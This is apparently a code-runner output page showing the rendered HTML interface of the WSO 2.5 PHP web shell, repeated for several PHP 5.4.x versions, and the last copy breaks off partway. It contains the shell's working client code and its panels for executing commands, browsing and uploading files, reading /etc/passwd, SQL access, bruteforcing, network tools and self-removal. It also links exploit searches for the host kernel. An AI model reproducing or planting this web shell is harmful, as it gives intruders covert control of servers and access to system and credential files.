width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.38 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.37
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.37 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.36
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.36 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.35
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.35 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" onclick="g('Console',null,'','','')">Console</a> ]</th><th width="11%">[ <a href="#" onclick="g('Sql',null,'','','')">Sql</a> ]</th><th width="11%">[ <a href="#" onclick="g('Php',null,'','','')">Php</a> ]</th><th width="11%">[ <a href="#" onclick="g('StringTools',null,'','','')">String tools</a> ]</th><th width="11%">[ <a href="#" onclick="g('Bruteforce',null,'','','')">Bruteforce</a> ]</th><th width="11%">[ <a href="#" onclick="g('Network',null,'','','')">Network</a> ]</th><th width="11%">[ <a href="#" onclick="g('SelfRemove',null,'','','')">Self remove</a> ]</th></tr></table><div style="margin:5"><h1>Server security information</h1><div class=content><span>Disabled PHP Functions: </span>pcntl_fork,phpinfo,mail<br><span>cURL support: </span>no<br><br><span>Readable /etc/passwd: </span>yes <a href='#' onclick='g("FilesTools", "/etc/", "passwd")'>[view]</a><br><span>Readable /etc/shadow: </span>no<br><span>OS version: </span>Linux version 4.11.3-1-ARCH (builduser@tobias) (gcc version 7.1.1 20170516 (GCC) ) #1 SMP PREEMPT Sun May 28 10:40:17 CEST 2017<br><br><br/><span>Hosts: </span><pre class=ml1># # /etc/hosts: static lookup table for host names # #<ip-address> <hostname.domain.org> <hostname> 127.0.0.1 localhost.localdomain localhost ::1 localhost.localdomain localhost # End of file</pre><br/><span>posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit='g(null,null,"5",this.param1.value,this.param2.value);return false;'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form></div> </div> <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100% style='border-top:2px solid #333;border-bottom:2px solid #333;'> <tr> <td><form onsubmit='g(null,this.c.value,"");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='/'><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value);return false;"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('FilesMan',null,'mkdir',this.d.value);return false;"><span>Make dir:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td> <td><form onsubmit="g('FilesTools',null,this.f.value,'mkfile');return false;"><span>Make file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td> </tr><tr> <td><form onsubmit="g('Console',null,this.c.value);return false;"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td> <td><form method='post' ENCTYPE='multipart/form-data'> <input type=hidden name=a value='FilesMAn'> <input type=hidden name=c value='/'> <input type=hidden name=p1 value='uploadFile'> <input type=hidden name=charset value=''> <span>Upload file:</span> <font color=red>(Not writable)</font><br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br ></td> </tr></table></div></body></html>
Output for 5.4.34
<html><head><meta http-equiv='Content-Type' content='text/html; charset='><title> - WSO 2.5</title> <style> body{background-color:#444;color:#e1e1e1;} body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; } table.info{ color:#fff;background-color:#222; } span,h1,a{ color: !important; } span{ font-weight: bolder; } h1{ border-left:5px solid ;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; } div.content{ padding: 5px;margin-left:5px;background-color:#333; } a{ text-decoration:none; } a:hover{ text-decoration:underline; } .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; } .bigarea{ width:100%;height:300px; } input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid ; font: 9pt Monospace,'Courier New'; } form{ margin:0px; } #toolsTbl{ text-align:center; } .toolsInp{ width: 300px } .main th{text-align:left;background-color:#5e5e5e;} .main tr:hover{background-color:#5e5e5e} .l1{background-color:#444} .l2{background-color:#333} pre{font-family:Courier,Monospace;} </style> <script> var c_ = '/'; var a_ = 'SecInfo' var charset_ = ''; var p1_ = ''; var p2_ = ''; var p3_ = ''; var d = document; function set(a,c,p1,p2,p3,charset) { if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_; if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_; if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_; if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_; if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_; if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_; } function g(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); d.mf.submit(); } function a(a,c,p1,p2,p3,charset) { set(a,c,p1,p2,p3,charset); var params = 'ajax=true'; for(i=0;i<d.mf.elements.length;i++) params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value); sr('', params); } function sr(url, params) { if (window.XMLHttpRequest) req = new XMLHttpRequest(); else if (window.ActiveXObject) req = new ActiveXObject('Microsoft.XMLHTTP'); if (req) { req.onreadystatechange = processReqChange; req.open('POST', url, true); req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded'); req.send(params); } } function processReqChange() { if( (req.readyState == 4) ) if(req.status == 200) { var reg = new RegExp("(\\d+)([\\S\\s]*)", 'm'); var arr=reg.exec(req.responseText); eval(arr[2].substr(0, arr[1])); } else alert('Request error!'); } </script> <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'> <form method=post name=mf style='display:none;'> <input type=hidden name=a> <input type=hidden name=c> <input type=hidden name=p1> <input type=hidden name=p2> <input type=hidden name=p3> <input type=hidden name=charset> </form><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:</span></td><td><nobr>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64 <a href="http://exploit-db.com/search/?action=search&filter_description=Linux+Kernel+4.8.6-" target=_blank>[exploit-db.com]</a></nobr><br>99 ( nobody ) <span>Group:</span> 99 ( nobody )<br>5.4.34 <span>Safe mode:</span> <font color=green><b>OFF</b></font> <a href=# onclick="g('Php',null,'','info')">[ phpinfo ]</a> <span>Datetime:</span> 2016-03-04 23:18:05<br>476.94 GB <span>Free:</span> 326.48 GB (68%)<br><a href='#' onclick='g("FilesMan","/")'>/</a> <font color=#FF0000>d-wx--x--x</font> <a href=# onclick="g('FilesMan','/','','','')">[ home ]</a><br></td><td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset"><option value="UTF-8" >UTF-8</option><option value="Windows-1251" >Windows-1251</option><option value="KOI8-R" >KOI8-R</option><option value="KOI8-U" >KOI8-U</option><option value="cp866" >cp866</option></optgroup></select><br><span>Server IP:</span><br><br><span>Client IP:</span><br></nobr></td></tr></table><table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr><th width="11%">[ <a href="#" onclick="g('SecInfo',null,'','','')">Sec. Info</a> ]</th><th width="11%">[ <a href="#" onclick="g('FilesMan',null,'','','')">Files</a> ]</th><th width="11%">[ <a href="#" 